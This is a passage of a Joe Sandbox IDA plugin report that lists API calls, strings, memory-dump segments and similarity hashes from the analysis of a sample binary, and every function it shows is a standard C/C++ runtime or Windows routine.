                                          • Instruction Fuzzy Hash: 5BF09632740218BBCF116F91CD06EAE7F65EB15720F11C165FD099A161DE719F11A6C4
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F61C1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • BufferedTransformation: this object can't be reinitialized, xrefs: 009F6198
                                          • w#G!, xrefs: 009F6184
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: BufferedTransformation: this object can't be reinitialized$w#G!
                                          • API String ID: 3976011213-2950935438
                                          • Opcode ID: 7b36ffa0527c324372409d4e85ebb56e2f323e086bc67a75544bf46c0683bcd0
                                          • Instruction ID: a42447b4faf0241628956b15194f068d856794cea03911f3c2b946dc0fa7f4a4
                                          • Opcode Fuzzy Hash: 7b36ffa0527c324372409d4e85ebb56e2f323e086bc67a75544bf46c0683bcd0
                                          • Instruction Fuzzy Hash: E6F01C71910248AACF01EBE5CD42FEEB7B8FB08B10F440A29E511B6290EB746A088A50
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00A7466A,-00000020,00000FA0,00000000,?,?,?,?), ref: 00A732FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx$w#G!
                                          • API String ID: 2593887523-349527883
                                          • Opcode ID: 42c870de4e27d5fa6e20a886d73a8b90fa5e437323fd4a413d4b0debd420686b
                                          • Instruction ID: e50ca69138674bd15d0a2d624ae806189bbce6e9d9db7569d3d43282db534fb1
                                          • Opcode Fuzzy Hash: 42c870de4e27d5fa6e20a886d73a8b90fa5e437323fd4a413d4b0debd420686b
                                          • Instruction Fuzzy Hash: 79F0B436741308BBCF119F50CD02D9EBFB1EB18710F01C125FE099A260DE718E21AB84
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Free
                                          • String ID: FlsFree$w#G!
                                          • API String ID: 3978063606-713219860
                                          • Opcode ID: aeeeda3a9cd8e24e36822fd6c251c392c45a24209484ec184236982d231921ce
                                          • Instruction ID: cf93f90e9f5a95317d8121ad1eba29514a50f9c428d4788e45834c2189663971
                                          • Opcode Fuzzy Hash: aeeeda3a9cd8e24e36822fd6c251c392c45a24209484ec184236982d231921ce
                                          • Instruction Fuzzy Hash: 61E0E532B80218BF8B00AF649C06E3FBBF0EF54B10B118169FD099B241CE704F1196C6
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc$w#G!
                                          • API String ID: 2773662609-3967997801
                                          • Opcode ID: 3371a135c7800299e240b173f3f983864910bdac6d3e275f463929be42d59e27
                                          • Instruction ID: 81fa90d86a5fbdc4402b1d4a053cf4f97018f355e3fd56f403e1055161aa8d40
                                          • Opcode Fuzzy Hash: 3371a135c7800299e240b173f3f983864910bdac6d3e275f463929be42d59e27
                                          • Instruction Fuzzy Hash: 60E0EC31740314BB8A019FE49D05E6E77B4DB54711B418265FD0996240DDB15F1256C5
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2432
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: Dflt$w#G!
                                          • API String ID: 2659868963-2762319387
                                          • Opcode ID: 19b8c0ce37fe9b9cbeb6dc2ba85fa1e8197bd27f0c4e381f9bac955803ee8ce8
                                          • Instruction ID: 2da819363344bc780b06f09caac1e64cf1a5791886e1f662f8e21bf29e01e0e1
                                          • Opcode Fuzzy Hash: 19b8c0ce37fe9b9cbeb6dc2ba85fa1e8197bd27f0c4e381f9bac955803ee8ce8
                                          • Instruction Fuzzy Hash: 18F08275E1420CDBCB15DF68D98198EBBF4AF55300B1082AEE545A7300EAB06A59CB95
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: w#G!
                                          • API String ID: 593203224-519468572
                                          • Opcode ID: 140040e6392e0dcd0a21508a0e521916051b413350f0027b773f925a67177223
                                          • Instruction ID: ef42d59d05ae3a1c3cc4420403d183b4ebdc9b644436cb9733ea7740457d25d6
                                          • Opcode Fuzzy Hash: 140040e6392e0dcd0a21508a0e521916051b413350f0027b773f925a67177223
                                          • Instruction Fuzzy Hash: 5DF01230911218DFD714EF68EA41BA9B7F4FB15311F50026ED58657280EF705D56CB85
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2493
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: bad conversion$w#G!
                                          • API String ID: 2659868963-4250247085
                                          • Opcode ID: 7a5a426d2016721306906442fa02054723dc33af702f2be3a128faf2cdeb554e
                                          • Instruction ID: 1e05a322e607be38c038dea8e2b771cbffcc229fa0587de932cc785f7ad4212e
                                          • Opcode Fuzzy Hash: 7a5a426d2016721306906442fa02054723dc33af702f2be3a128faf2cdeb554e
                                          • Instruction Fuzzy Hash: 2EF082709102489BC711DF68D94199EF7F8EF55301B1042AEE54167301EBB05A598B95
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: {flat}
                                          • API String ID: 1333004437-2606204563
                                          • Opcode ID: a4ba9e70e0b1a68f92c04626c0730d60b452ba2f96fe2b825b907b0b1ee0fea6
                                          • Instruction ID: f3a8ccc9ae980f31d148c188dc2da52bf6367664a02e1d70bc066bdbfa5ed9ba
                                          • Opcode Fuzzy Hash: a4ba9e70e0b1a68f92c04626c0730d60b452ba2f96fe2b825b907b0b1ee0fea6
                                          • Instruction Fuzzy Hash: D5F03971251208DFDB10DB98D5A5FEA3BE0AB01716F198445E84D4F6A2CB79D8D087A0
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A52754
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A52762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pThreadProxy
                                          • API String ID: 1687795959-3651400591
                                          • Opcode ID: a163394ad03c894ab8c443a84b4fc079c81765e936747da11f26ee31420ff303
                                          • Instruction ID: 9c12dc067fc2b7a410195577ce78de2a2983bbf7b3ce8e081a938ae6dd5b4f9a
                                          • Opcode Fuzzy Hash: a163394ad03c894ab8c443a84b4fc079c81765e936747da11f26ee31420ff303
                                          • Instruction Fuzzy Hash: 1FD05B31E0030866CB00E775D947FDE73EC7B04744F0044786D14A6051EA70D50887A0
                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00A58FB1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A58FD8
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 00A58FA8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2053020834-2158758863
                                          • Opcode ID: 2f3ab51f24edded8e3e82108044053a861bec7d90feaebcf6b36963082007b47
                                          • Instruction ID: 249f172d4a8a9db70cef93931b3329746a7a489e8c13cb9598b315596da54d33
                                          • Opcode Fuzzy Hash: 2f3ab51f24edded8e3e82108044053a861bec7d90feaebcf6b36963082007b47
                                          • Instruction Fuzzy Hash: 84D0C932D4420C6ADE18D6E09A0B8EE63F8B908311F200886EF20BB441AE75BE0C47A1